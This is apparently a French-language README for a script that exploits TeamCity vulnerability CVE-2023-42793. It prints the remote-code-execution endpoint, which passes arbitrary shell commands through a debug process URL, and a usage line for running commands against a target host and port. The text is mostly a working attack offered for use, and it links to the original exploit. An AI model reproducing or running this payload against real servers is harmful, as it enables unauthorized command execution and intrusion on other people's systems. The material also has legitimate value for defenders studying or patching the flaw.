
teamcity-exploit-cve-2023-42793
Un script rapide pour exploiter la faille cve-2023-42793. Des lectures complémentaires sur l'exploit sont disponibles ici :
https://www.cnblogs.com/LittleHann/p/17843271.html
Ce script ajoute la possibilité d'utiliser librement « params » pour exécuter des commandes après avoir déclenché la faille RCE :
RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"
Usage: <base_url> <port> <command>
./TeamCity.sh blah.com 8111 "ls -lah"
Le script original est ici, tout le crédit leur revient : https://github.com/Zenmovie/CVE-2023-42793